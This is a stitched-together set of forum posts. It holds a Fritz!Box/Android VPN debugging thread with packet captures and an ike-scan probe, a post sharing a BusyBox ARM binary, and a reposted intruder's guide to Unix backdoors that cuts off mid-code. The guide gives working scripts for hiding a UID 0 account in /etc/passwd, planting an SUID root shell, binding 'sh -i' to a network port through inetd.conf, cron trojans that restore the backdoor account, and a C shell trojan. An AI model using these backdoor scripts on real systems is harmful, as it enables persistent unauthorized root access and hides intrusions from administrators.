08/03/2011 17:01:58 [DEBUG] SProxy_racoon(6207) stopping racoon, success? true
08/03/2011 17:03:49 [INFORMATION] SProxy_racoon(6207) Stop VPN daemon: racoon
08/03/2011 17:03:49 [DEBUG] SProxy_racoon(6207) racoon is stopped after 0 msec
08/03/2011 17:03:49 [DEBUG] SProxy_racoon(6207) stopping racoon, success? true
08/03/2011 17:03:49 [INFORMATION] SProxy_racoon(6207) Start VPN daemon: racoon
08/03/2011 17:03:49 [DEBUG] SProxy_racoon(6207) racoon is running after 0 msec
08/03/2011 17:03:49 [DEBUG] racoon(7090) Waiting for control socket
08/03/2011 17:03:49 [DEBUG] SProxy_racoon(6207) service not yet listen()ing; try again
08/03/2011 17:03:50 [DEBUG] racoon(7090) Received 3 arguments
08/03/2011 17:03:50 [INFORMATION] racoon(7090) ipsec-tools 0.7.3 (http://ipsec-tools.sf.net)
08/03/2011 17:03:50 [INFORMATION] racoon(7090) 192.168.0.106[500] used as isakmp port (fd=10)
08/03/2011 17:03:50 [INFORMATION] racoon(7090) 192.168.0.106[500] used for NAT-T
08/03/2011 17:03:50 [INFORMATION] racoon(7090) 192.168.0.106[4500] used as isakmp port (fd=11)
08/03/2011 17:03:50 [INFORMATION] racoon(7090) 192.168.0.106[4500] used for NAT-T
08/03/2011 17:03:50 [INFORMATION] SProxy_racoon(6207) got data from control socket: 3
08/03/2011 17:03:52 [INFORMATION] racoon(7090) no in-bound policy found: 192.168.0.3/32[1701] 192.168.0.106/32[0] proto=udp dir=in
08/03/2011 17:03:52 [INFORMATION] racoon(7090) IPsec-SA request for 192.168.0.3 queued due to no phase1 found.
08/03/2011 17:03:52 [INFORMATION] racoon(7090) initiate new phase 1 negotiation: 192.168.0.106[500]<=>192.168.0.3[500]
08/03/2011 17:03:52 [INFORMATION] racoon(7090) begin Identity Protection mode.
08/03/2011 17:04:23 [ERROR] racoon(7090) phase2 negotiation failed due to time up waiting for phase1. ESP 192.168.0.3[0]->192.168.0.106[0]
08/03/2011 17:04:23 [INFORMATION] racoon(7090) delete phase 2 handler.
08/03/2011 17:04:23 [INFORMATION] racoon(7090) Bye
08/03/2011 17:04:35 [INFORMATION] SProxy_racoon(6207) Stop VPN daemon: racoon
08/03/2011 17:04:35 [DEBUG] SProxy_racoon(6207) racoon is stopped after 0 msec
08/03/2011 17:04:35 [DEBUG] SProxy_racoon(6207) stopping racoon, success? true
I'm trying to adapt the fritzbox vpn config to match the faulting android 2.3.3 built-in vpn-client's requirements, further logs from other vpn-clients will follow.
The android vpn asks for xauth credentials, trying to configure fritzbox for xauth...
no success,
android racoon still phase 1 waiting timeout, changing fritzbox from aggressive to main mode...
no success, still phase1 time out, taking and analyzing wireshark dump from
http://fritz.box//html/capture.html (if ath0 or guest1 etc)
Ok, here's what the android racoon sends to the fritz.box:
Code:
$ /usr/sbin/tcpdump -vvv -r fritz-ath0.eth src or dst port 500 or src or dst port l2f
reading from file fritz-ath0.eth, link-type EN10MB (Ethernet)
00:29:57.082587 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 380)
htc.fritz.box.isakmp > fritz.box.isakmp: [udp sum ok] isakmp 1.0 msgid 00000000 cookie 3958b87fd7c4e0a9->0000000000000000: phase 1 I ident:
(sa: doi=ipsec situation=identity
(p: #1 protoid=isakmp transform=6
(t: #1 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=3des)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #2 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=3des)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))
(t: #3 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=1des)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #4 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=1des)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))
(t: #5 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=aes)(type=keylen value=0080)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #6 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=aes)(type=keylen value=0080)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))))
(vid: len=16 4a131c81070358455c5728f20e95452f)
(vid: len=16 cd60464335df21f87cfdb2fc68b6a448)
(vid: len=16 90cb80913ebb696e086381b5ec427b1f)
(vid: len=16 4485152d18b6bbcd0be8a8469579ddcc)
(vid: len=20 4048b7d56ebce88525e7de7f00d6c2d380000000)
00:30:07.104380 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 380)
htc.fritz.box.isakmp > fritz.box.isakmp: [udp sum ok] isakmp 1.0 msgid 00000000 cookie 3958b87fd7c4e0a9->0000000000000000: phase 1 I ident:
(sa: doi=ipsec situation=identity
(p: #1 protoid=isakmp transform=6
(t: #1 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=3des)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #2 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=3des)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))
(t: #3 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=1des)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #4 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=1des)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))
(t: #5 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=aes)(type=keylen value=0080)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #6 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=aes)(type=keylen value=0080)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))))
(vid: len=16 4a131c81070358455c5728f20e95452f)
(vid: len=16 cd60464335df21f87cfdb2fc68b6a448)
(vid: len=16 90cb80913ebb696e086381b5ec427b1f)
(vid: len=16 4485152d18b6bbcd0be8a8469579ddcc)
(vid: len=20 4048b7d56ebce88525e7de7f00d6c2d380000000)
00:30:17.123829 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 380)
htc.fritz.box.isakmp > fritz.box.isakmp: [udp sum ok] isakmp 1.0 msgid 00000000 cookie 3958b87fd7c4e0a9->0000000000000000: phase 1 I ident:
(sa: doi=ipsec situation=identity
(p: #1 protoid=isakmp transform=6
(t: #1 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=3des)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #2 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=3des)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))
(t: #3 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=1des)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #4 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=1des)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))
(t: #5 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=aes)(type=keylen value=0080)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #6 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=aes)(type=keylen value=0080)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))))
(vid: len=16 4a131c81070358455c5728f20e95452f)
(vid: len=16 cd60464335df21f87cfdb2fc68b6a448)
(vid: len=16 90cb80913ebb696e086381b5ec427b1f)
(vid: len=16 4485152d18b6bbcd0be8a8469579ddcc)
(vid: len=20 4048b7d56ebce88525e7de7f00d6c2d380000000)
00:30:27.145065 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 380)
htc.fritz.box.isakmp > fritz.box.isakmp: [udp sum ok] isakmp 1.0 msgid 00000000 cookie 3958b87fd7c4e0a9->0000000000000000: phase 1 I ident:
(sa: doi=ipsec situation=identity
(p: #1 protoid=isakmp transform=6
(t: #1 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=3des)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #2 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=3des)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))
(t: #3 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=1des)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #4 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=1des)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))
(t: #5 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=aes)(type=keylen value=0080)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #6 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=aes)(type=keylen value=0080)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))))
(vid: len=16 4a131c81070358455c5728f20e95452f)
(vid: len=16 cd60464335df21f87cfdb2fc68b6a448)
(vid: len=16 90cb80913ebb696e086381b5ec427b1f)
(vid: len=16 4485152d18b6bbcd0be8a8469579ddcc)
(vid: len=20 4048b7d56ebce88525e7de7f00d6c2d380000000)
00:30:29.149902 IP (tos 0x0, ttl 64, id 51970, offset 0, flags [DF], proto UDP (17), length 97)
htc.fritz.box.51610 > fritz.box.l2f: [udp sum ok] l2tp:[TLS](0/0)Ns=0,Nr=0 *MSGTYPE(SCCRQ) *PROTO_VER(1.0) *HOST_NAME(anonymous) *FRAMING_CAP(AS) *ASSND_TUN_ID(798) *RECV_WIN_SIZE(1)
Code:
$ ike-scan -v -s 0 fritz.box
DEBUG: pkt len=336 bytes, bandwidth=56000 bps, int=52000 us
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
--- Pass 1 of 3 completed
--- Pass 2 of 3 completed
--- Pass 3 of 3 completed
Ending ike-scan 1.9: 1 hosts scanned in 2.445 seconds (0.41 hosts/sec). 0 returned handshake; 0 returned notify
wireshark compatible file is attached.
I've found the allowed ipsec strategies for /bin/avmike in
Code:
# find / -name *ipsec*
/etc/default.Fritz_Box_7240/1und1/ipsec.cfg
/etc/default.Fritz_Box_7240/avm/ipsec.cfg
#
#
# find / -name *ike*
/bin/avmike
/lib/libikeapi.so
/lib/libikeapi.so.2
/lib/libikeapi.so.2.0.0
/lib/libikecrypto.so
/lib/libikecrypto.so.1
/lib/libikecrypto.so.1.0.0
/lib/libikeossl.so
/lib/libikeossl.so.1
/lib/libikeossl.so.1.0.0
/var/run/avmike.pid
/var/tmp/csem/M-ikeapi-reply-dsld-W
/var/tmp/csem/M-ikeapi-reply-dsld-R
/var/tmp/csem/M-ikeapi-request-dsld-W
/var/tmp/csem/M-ikeapi-request-dsld-R
#
# find / -name *vpn*
/etc/default.Fritz_Box_7240/1und1/vpn.cfg
/etc/default.Fritz_Box_7240/avm/vpn.cfg
/usr/share/ctlmgr/libvpnstat.so
/usr/www/1und1/html/de/internet/vpn.frm
/usr/www/1und1/html/de/internet/vpn.html
/usr/www/1und1/html/de/internet/vpn.js
/usr/www/1und1/html/de/menus/menu2_vpn.html
/usr/www/1und1/html/de/vpn
/usr/www/1und1/html/vpn_import_nok_reboot.html
/usr/www/1und1/html/vpn_import_ok_reboot.html
/usr/www/1und1/html/vpn_import_pwd_nok_reboot.html
/usr/www/avm/html/de/internet/vpn.frm
/usr/www/avm/html/de/internet/vpn.html
/usr/www/avm/html/de/internet/vpn.js
/usr/www/avm/html/de/menus/menu2_vpn.html
/usr/www/avm/html/de/vpn
/usr/www/avm/html/vpn_import_nok_reboot.html
/usr/www/avm/html/vpn_import_ok_reboot.html
/usr/www/avm/html/vpn_import_pwd_nok_reboot.html
/var/vpnroutes
/var/flash/vpn.cfg
/var/tmp/vpncfgimport.eff
#
# avmike -h
illegal option 'h'
usage: avmike avm_ike [options]
options:
-? - print this help
-D STRING - switch debug logs on. (NULL)
-d - debug service. (NOTSET)
-f - run in forground. (NOTSET)
-s - stop daemon. (NOTSET)
-v - verbose. (NOTSET)
-p STRING - Pidfile. ("/var/run/avmike.pid")
-w - [Hit return to continue]. (NOTSET)
-p INTEGER - port to use. (0)
ISAKMP/IPSec negoiation server
Trying to enable debug logs... debug options silently disabled in release build.
Matching fritzbox factory ike config for Android 2.3.3 racoon is phase1ss = "racoon-dh2-aes-sha", but --lifetime=3600 or datatype length or formatting, or wrong other config file settings:
Code:
# ike-scan fritz.box -M --retry=1 --trans=7/128,2,1,2 --lifetime=3600
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
Ending ike-scan 1.9: 1 hosts scanned in 0.532 seconds (1.88 hosts/sec). 0 returned handshake; 0 returned notify
19:37:36.599736 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto UDP (17), length 116)
tom1.isakmp > fritz.box.isakmp: [udp sum ok] isakmp 1.0 msgid 00000000 cookie 84cdf79f56296b8b->0000000000000000: phase 1 I ident:
(sa: doi=ipsec situation=identity
(p: #1 protoid=isakmp transform=1
(t: #1 id=ike (type=enc value=aes)(type=hash value=sha1)(type=auth value=preshared)(type=group desc value=modp1024)(type=keylen value=0080)(type=lifetype value=sec)(type=lifeduration [B]len=4 value=00007080[/B]))))
No answer from avmike, trying Android... no success.
Surely config file mismatch, see http://www.ip-phone-forum.de/showthread.php?t=161793&p=1672919&viewfull=1#post1672919 and search there under avm for posts containing phase1_mode_idp.
No. Tried to override the /etc/default/ipsec.cfg inline in vpn.cfg and > /var/flash/vpn.cfg but the box does all to prevent any tricks to change the ipsec.cfg, even removing the ipsec part from vpn.cfg when in comments.
Giving up and will remove the proprietary crap avm vpn daemon from the box, install something like freetz with racoon.
For those not able or not wanting to root their phone, here's the solution for fritzbox:
http://www.ip-phone-forum.de/showthread.php?t=197637&pagenumber=
http://freetz.org/ticket/854
(Mostly German, use Google Translate)
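The transform lists in the tcpdump output above can be decoded and compared mechanically instead of by eye. This is an added example, not code from the thread: the function names are hypothetical, and `POLICY` is an assumption that mirrors the transform probed with `--trans=7/128,2,1,2` (AES-128, SHA1, pre-shared key, modp1024).

```python
import re

# Transform lines as tcpdump printed them in the capture above (a subset of
# the six offered by the Android racoon).
ANDROID_PROPOSAL = """\
(t: #1 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=3des)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #4 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=1des)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))
(t: #5 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=aes)(type=keylen value=0080)(type=auth value=preshared)(type=hash value=sha1)(type=group desc value=modp1024))
(t: #6 id=ike (type=lifetype value=sec)(type=lifeduration value=7080)(type=enc value=aes)(type=keylen value=0080)(type=auth value=preshared)(type=hash value=md5)(type=group desc value=modp1024))))
"""

# The single transform sent by ike-scan (forum bold markers removed).
IKE_SCAN_PROPOSAL = (
    "(t: #1 id=ike (type=enc value=aes)(type=hash value=sha1)"
    "(type=auth value=preshared)(type=group desc value=modp1024)"
    "(type=keylen value=0080)(type=lifetype value=sec)"
    "(type=lifeduration len=4 value=00007080))))"
)

# Assumed responder policy (hypothetical): what --trans=7/128,2,1,2 asks for.
POLICY = {"enc": "aes", "keylen": 128, "hash": "sha1",
          "auth": "preshared", "group desc": "modp1024"}

TRANSFORM_RE = re.compile(r"\(t: #(\d+) id=ike ")
# An attribute is "(type=NAME value=V)" or "(type=NAME len=N value=V)".
ATTR_RE = re.compile(r"\(type=([a-z ]+?)(?: len=\d+)? value=([0-9a-z]+)\)")
HEX_ATTRS = {"keylen", "lifeduration"}  # tcpdump prints these values in hex


def parse_transforms(text):
    """Return one dict per '(t: #N ...)' line with decoded attributes."""
    transforms = []
    for line in text.splitlines():
        head = TRANSFORM_RE.search(line)
        if not head:
            continue
        attrs = {"num": int(head.group(1))}
        for name, value in ATTR_RE.findall(line):
            attrs[name] = int(value, 16) if name in HEX_ATTRS else value
        transforms.append(attrs)
    return transforms


def mismatches(transform, policy):
    """List the policy attributes this transform does not satisfy."""
    return sorted(k for k, want in policy.items() if transform.get(k) != want)


def diagnose(text, policy=POLICY):
    """Map transform number -> (mismatching attributes, lifetime in seconds)."""
    return {t["num"]: (mismatches(t, policy), t.get("lifeduration"))
            for t in parse_transforms(text)}


if __name__ == "__main__":
    for label, text in (("android", ANDROID_PROPOSAL),
                        ("ike-scan", IKE_SCAN_PROPOSAL)):
        for num, (diff, life) in diagnose(text).items():
            verdict = "MATCH" if not diff else "differs on " + ", ".join(diff)
            print(f"{label} #{num}: lifetime={life}s {verdict}")
```

Under that assumed policy, Android transform #5 and the ike-scan transform decode to the same attribute set and the same 28800-second lifetime; the only visible difference is that ike-scan encodes the lifetime as a 4-byte value.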

BusyBox v1.18.5 arm binary

Compiled it for myself, maybe someone will find it useful
BusyBox v1.18.5 (2011-07-18 07:43:28 PDT) multi-call binary.
Copyright (C) 1998-2009 Erik Andersen, Rob Landley, Denys Vlasenko
and others. Licensed under GPLv2.
See source distribution for full notice.
Usage: busybox [function] [arguments]...
or: busybox --list[-full]
or: function [arguments]...
BusyBox is a multi-call binary that combines many common Unix
utilities into a single executable. Most people will create a
link to busybox for each function they wish to use and BusyBox
will act like whatever it was invoked as.
Currently defined functions:
[, [[, acpid, add-shell, addgroup, adduser, adjtimex, ar, arp, arping,
ash, awk, base64, basename, beep, blkid, blockdev, bootchartd, brctl,
bunzip2, bzcat, bzip2, cal, cat, catv, chat, chattr, chgrp, chmod,
chown, chpasswd, chpst, chroot, chrt, chvt, cksum, clear, cmp, comm,
cp, cpio, crond, crontab, cryptpw, cttyhack, cut, date, dc, dd,
deallocvt, delgroup, deluser, depmod, devmem, df, dhcprelay, diff,
dirname, dmesg, dnsd, dnsdomainname, dos2unix, du, dumpkmap,
dumpleases, echo, ed, egrep, eject, env, envdir, envuidgid, ether-wake,
expand, expr, fakeidentd, false, fbset, fbsplash, fdflush, fdformat,
fdisk, fgconsole, fgrep, find, findfs, flock, fold, free, freeramdisk,
fsck, fsck.minix, fsync, ftpd, ftpget, ftpput, fuser, getopt, getty,
grep, gunzip, gzip, halt, hd, hdparm, head, hexdump, hostid, hostname,
httpd, hush, hwclock, id, ifconfig, ifdown, ifenslave, ifplugd, ifup,
inetd, init, insmod, install, ionice, iostat, ip, ipaddr, ipcalc,
ipcrm, ipcs, iplink, iproute, iprule, iptunnel, kbd_mode, kill,
killall, killall5, klogd, last, length, less, linux32, linux64,
linuxrc, ln, loadfont, loadkmap, logger, login, logname, logread,
losetup, lpd, lpq, lpr, ls, lsattr, lsmod, lspci, lsusb, lzcat, lzma,
lzop, lzopcat, makedevs, makemime, man, md5sum, mdev, mesg, microcom,
mkdir, mkdosfs, mke2fs, mkfifo, mkfs.ext2, mkfs.minix, mkfs.vfat,
mknod, mkpasswd, mkswap, mktemp, modinfo, modprobe, more, mount,
mountpoint, mpstat, mt, mv, nameif, nbd-client, nc, netstat, nice,
nmeter, nohup, nslookup, ntpd, od, openvt, passwd, patch, pgrep, pidof,
ping, ping6, pipe_progress, pivot_root, pkill, pmap, popmaildir,
poweroff, powertop, printenv, printf, ps, pscan, pwd, raidautorun,
rdate, rdev, readahead, readlink, readprofile, realpath, reboot,
reformime, remove-shell, renice, reset, resize, rev, rm, rmdir, rmmod,
route, rpm, rpm2cpio, rtcwake, run-parts, runlevel, runsv, runsvdir,
rx, script, scriptreplay, sed, sendmail, seq, setarch, setconsole,
setfont, setkeycodes, setlogcons, setsid, setuidgid, sh, sha1sum,
sha256sum, sha512sum, showkey, slattach, sleep, smemcap, softlimit,
sort, split, start-stop-daemon, stat, strings, stty, su, sulogin, sum,
sv, svlogd, swapoff, swapon, switch_root, sync, sysctl, syslogd, tac,
tail, tar, tcpsvd, tee, telnet, telnetd, test, tftp, tftpd, time,
timeout, top, touch, tr, traceroute, traceroute6, true, tty, ttysize,
tunctl, udhcpc, udhcpd, udpsvd, umount, uname, uncompress, unexpand,
uniq, unix2dos, unlzma, unlzop, unxz, unzip, uptime, usleep, uudecode,
uuencode, vconfig, vi, vlock, volname, wall, watch, watchdog, wc, wget,
which, who, whoami, xargs, xz, xzcat, yes, zcat, zcip
ls coloring is enabled but didn't default
http://www.neroon.com/BusyBox_v1.18.5_android/busybox
PS: Compiled according to:
http://www.arm9board.net/wiki/index.php?title=Filesystem_using_Busybox
http://afewe.wordpress.com/android-arm-development/cross-compile-busybox-for-arm-android/
good work, thx!
one question:
can ntpd act as an ntp time server ?
I ran "ntpd -l" and looked at "netstat" output, found that the ntpd daemon has started at port 123, but the state showed CLOSED, not LISTEN.
Any suggestions to run an NTP time server on an android phone?
psfan said:
can ntpd act as an ntp time server ?
AFAIK no
http://linux.die.net/man/1/ntpd
I have been looking for a way to use terminal shell to push a file using ftpput, does this work on yours?
What's the best way to add this to my Evo 4G CM7?
Thanks for your work on this

#a backdoor into unix/linux os;

I thought this was an interesting paper written by an unknown author
You've been at it for all night. Trying all the exploits you can think of. The system seems tight. The system looks tight.
The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect
permissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing. After seeming endless you've managed to steal root. Now what? How do you hold onto this precious super-user
privilege you have worked so hard to achieve....?
This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are
ways into one.
Beforehand
Know the location of critical system files. This should be obvious (If you can't list any off the top of your head, stop reading
now, get a book on UNIX, read it, then come back to me...). Familiarity with passwd file formats (including general 7 field
format, system specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those
robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful for needing to quickly search and edit a large file. If
you are connecting remotely (via dial-up/telnet/rlogin/whatever) it's always nice to have a robust terminal program that has a
nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...
The permanence of these backdoors will depend completely on the technical savvy of the administrator. The experienced and
skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the
admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time
to come. One major thing to be aware of, is the fact that if you can cover your tracks during the initial break-in, no one will be
looking for back doors.
The JDevil Overt
[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of reentry. It
flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply
prepend or append it. Anyone casually examining the passwd file will see this. So, why not stick it in the middle...
#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# [email protected]
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:jdevil:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
NEVER, EVER, change the root password. The reasons are obvious.
[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somewhere buried deep in the
passwd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second
field).
[3] Leave an SUID root shell in /tmp.
#!/bin/sh
# Everyone's favorite...
cp /bin/csh /tmp/.JDEVIL # Don't name it that...
chmod 4755 /tmp/.JDEVIL
Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted
to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may
notice...but, hey, this *is* the overt section....). I will not detail the changes necessary because they can be quite system
specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.
The JDEVIL Veiled
[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some
background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the
appropriate program (usually a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical
lines look like this:
(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine
which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect.
TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCP
or UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server will
process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a
child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more
importantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual
command (and optional arguments). If the program is trivial (usually requiring no user interaction) inetd may handle it internally.
This is done with an 'internal' flag in fields (6) and (7).
So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it
with something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd
file, etc...
For the insinuation-impaired, try this:
Open the /etc/inetd.conf in an available editor. Find the line that reads:
daytime stream tcp nowait root internal
and change it to:
daytime stream tcp nowait /bin/sh sh -i.
You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and
restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interrupt ALL network connections (so it is a good idea
to do this off peak hours).
[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. One
simple solution is to set up a shell that runs similar to the above backdoor. You need to make sure the entry appears in
/etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:
(1) (2)/(3) (4)
smtp 25/tcp mail
Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name
associated with the service. For instance, add this line to /etc/services:
jdevil 22/tcp jdevil
and this line to /etc/inetd.conf:
jdevil stream tcp nowait /bin/sh sh -i
Restart inetd as before.
Note: Potentially, these are VERY powerful backdoors. They not only offer local reentry from any account on the system,
they offer reentry from *any* account on *any* computer on the Internet.
[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's
crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this
backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usually located. Here, you have
several options. I will list only a few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon.
It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove,
or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab
entry has six fields:
(1) (2) (3) (4) (5) (6)
0 0 * * 1 /usr/bin/updatedb
Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week
(0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron,
simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the
/etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not
be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your
shady intentions). Add this line to /var/spool/crontab/root:
0 0 * * * /usr/bin/trojancode
This is the shell script:
#!/bin/csh
# Is our jdevil still on the system? Let's make sure he is.
#[email protected]
set JDEVILflag = (`grep jdevil /etc/passwd`)
if($#JDEVILflag == 0) then # Is he there?
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
split -$linecount[1] ./temppass # passwd string optional
echo "jdevil::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
else
endif
[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the
/etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root
account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a
copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!).
Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything
would be ok. Add this line to root's crontab file:
29 2 * * * /bin/usr/_passwd
make sure this exists:
#echo "root:1234567890123:0:0perator:/:/bin/csh" > /var/spool/mail/.passwd
and this is the simple shell script:
#!/bin/csh
# Install trojan /etc/passwd file for one minute
#[email protected]
cp /etc/passwd /etc/.temppass
cp /var/spool/mail/passwd /etc/passwd
sleep 60
mv /etc/.temppass /etc/passwd
[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is.
Make sure it runs as root. Name it something innocuous. Hide it well.
/* A little trojan to create an SUID root shell, if the proper argument is
given. C code, rather than shell to hide obvious it's effects. */
/* [email protected] */
#include
#define KEYWORD "industry3"
#define BUFFERSIZE 10
int main(argc, argv)
int argc;
char *argv[];{
int i=0;
